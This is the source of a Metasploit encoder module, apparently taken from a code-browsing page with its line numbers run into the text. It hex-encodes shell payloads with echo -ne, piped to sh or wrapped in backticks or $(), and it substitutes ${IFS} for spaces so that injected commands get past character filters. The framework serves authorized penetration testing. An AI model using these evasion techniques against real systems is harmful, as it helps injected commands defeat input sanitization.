Path: blob/master/modules/encoders/cmd/echo.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder6Rank = GoodRanking78def initialize9super(10'Name' => 'Echo Command Encoder',11'Description' => %q{12This encoder uses echo and backlash escapes to avoid commonly restricted characters.13},14'Author' => 'hdm',15'Arch' => ARCH_CMD,16'Platform' => %w[linux unix],17'EncoderType' => Msf::Encoder::Type::CmdPosixEcho)18end1920#21# Encodes the payload22#23def encode_block(state, buf)24# Skip encoding for empty badchars25return buf if state.badchars.empty?2627raise EncodingError if state.badchars.include?('-')2829# echo won't work without an escape character30raise EncodingError if state.badchars.include?('\\')3132encode_block_bash_echo(state, buf)33end3435#36# Uses bash's echo -ne command to hex encode the command string37#38def encode_block_bash_echo(state, buf)39hex = ''4041# Can we use single quotes to enclose the echo arguments?42if state.badchars.include?("'")43hex = buf.unpack('C*').collect { |c| '\\\\\\x%.2x' % c }.join44else45hex = "'" + buf.unpack('C*').collect { |c| '\\x%.2x' % c }.join + "'"46end4748# Are pipe characters restricted?49if state.badchars.include?('|')50# How about backticks?51if state.badchars.include?('`')52# Last ditch effort, dollar paren53if state.badchars.include?('$') || state.badchars.include?('(')54raise EncodingError55else56buf = "$(/bin/echo -ne #{hex})"57end58else59buf = "`/bin/echo -ne #{hex}`"60end61else62buf = "/bin/echo -ne #{hex}|sh"63end6465# Remove spaces from the command string66if state.badchars.include?(' ')67buf.gsub!(/\s/, '${IFS}')68end6970return buf71end72end737475